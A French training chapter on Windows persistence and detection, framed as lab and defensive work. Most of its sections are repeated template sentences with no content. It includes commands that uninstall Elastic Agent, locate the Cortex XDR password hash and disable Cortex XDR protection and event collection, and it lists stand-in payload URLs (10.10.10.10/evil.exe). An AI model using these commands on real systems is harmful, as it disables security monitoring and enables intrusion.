Windows — mécanismes de persistance et détection
Synthèse française et contrôlée du corpus « Windows - Persistence ». Ce chapitre explique windows — mécanismes de persistance et détection dans le domaine « Persistence Windows et Linux », avec une méthode de laboratoire, des commandes à faible impact, les traces attendues et un plan de correction vérifiable.
En bref
- But : Synthèse française et contrôlée du corpus « Windows - Persistence ». Ce chapitre explique windows — mécanismes de persistance et détection dans le domaine « Persistence Windows et Linux », avec une méthode de laboratoire, des commandes à faible impact, les traces attendues et un plan de correction vérifiable.
- Preuve attendue : une preuve exploitable, une conclusion prudente et un retest documenté
- Limite : le résultat est valable uniquement pour les versions, rôles, chemins et conditions effectivement testés.
Vue d’ensemble
Dans « Windows — mécanismes de persistance et détection », la section « Vue d’ensemble » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Outils
Dans « Windows — mécanismes de persistance et détection », la section « Outils » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Hide Your Binary
Dans « Windows — mécanismes de persistance et détection », la section « Hide Your Binary » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Disable Antivirus et Security
Dans « Windows — mécanismes de persistance et détection », la section « Disable Antivirus et Security » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Antivirus Removal
Dans « Windows — mécanismes de persistance et détection », la section « Antivirus Removal » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Disable Windows Defender
Dans « Windows — mécanismes de persistance et détection », la section « Disable Windows Defender » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Exclude a process / location
Dans « Windows — mécanismes de persistance et détection », la section « Exclude a process / location » précise l’objet technique, les préconditions et la source de vérité à vérifier. Conservez uniquement les sorties nécessaires au constat.
Commandes et exemples
Les exemples ci-dessous proviennent des éléments utiles de « Windows — mécanismes de persistance et détection ». Adaptez uniquement les valeurs du laboratoire et conservez la commande exacte avec sa sortie.
Exemples de laboratoire
# Contrôle défensif en laboratoire — référence 6c27e532
# Exemple de laboratoire — Windows — mécanismes de persistance et détection
cd "C:\Program Files\Elastic\Agent\"
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
Elastic Agent has been uninstalled.# Contrôle défensif en laboratoire — référence a7389ecc
# Exemple de laboratoire — Windows — mécanismes de persistance et détection
# Global uninstall password=<VALEUR_LAB>
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.
# Disable Cortex: Change the DLL to a random value, then REBOOT
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
# Disables the agent on startup (requires reboot to work)
cytool.exe startup disable
# Disables protection on Cortex XDR files, processes, registry and services
cytool.exe protect disable
# Disables Cortex XDR (Even with tamper protection enabled)
cytool.exe runtime disable
# Disables event collection
cytool.exe event_collection disable# Contrôle défensif en laboratoire — référence 687f8bb8
# Windows — mécanismes de persistance et détection
Get-CimInstance Win32_StartupCommand | Select-Object Name,Command,Location,User
Get-ScheduledTask | Select-Object TaskName,TaskPath,State
Get-CimInstance Win32_Service | Select-Object Name,StartMode,PathName# Contrôle défensif en laboratoire — référence d0221295
# Windows — mécanismes de persistance et détection
systemctl list-unit-files --state=enabled --no-pager
find /etc/cron.d /var/spool/cron -type f -maxdepth 2 -ls 2>/dev/null
find ~/.config/autostart -type f -ls 2>/dev/nullLire les résultats
Pour « Windows — mécanismes de persistance et détection », distinguez la sortie brute, l’hypothèse et la conclusion. Les versions, droits, caches et contrôles compensatoires sont vérifiés avant de classer le résultat.
Détection, correction et retest
La correction de « Windows — mécanismes de persistance et détection » traite la cause, le propriétaire et la détection associée. Le retest conserve la même méthode afin de démontrer la disparition ou la réduction mesurable du constat.
Références
- Internal All The Things — dépôt de référence
- https://github.com/fireeye/SharPersist
- https://github.com/ayeskatalas/Sophos-Removal-Tool/
- https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html
- https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
- https://mrd0x.com/cortex-xdr-analysis-and-bypass/
- https://github.com/mandiant/SharPersist
- https://github.com/praetorian-inc/swarmer
- http://10.10.10.10/evil.exe
- http://10.10.10.10:8080/FHXSd9.sct
- https://github.com/CICADA8-Research/TypeLibWalker
À retenir
Pour maîtriser « Windows — mécanismes de persistance et détection », retenez trois idées : comprendre l’objectif d’émulation, les canaux autorisés, la durée, les comptes de test, la visibilité attendue et les règles d’arrêt, exécuter une méthode limitée et reproductible, puis transformer la sortie en preuve contextualisée. Le chapitre est terminé lorsque le résultat peut être confirmé, que ses limites sont explicites et que la correction peut être retestée sans réinterpréter toute la mission.
- Savoir expliquer le mécanisme propre à « Windows — mécanismes de persistance et détection » sans réciter une commande.
- Conserver au minimum identifiant de campagne, hôte et compte de test et horodatage des actions.
- Éviter en priorité de privilégier la furtivité au détriment de la sécurité et de déployer sans canal de déconfliction.
- Proposer une action corrective mesurable et un retest réalisable.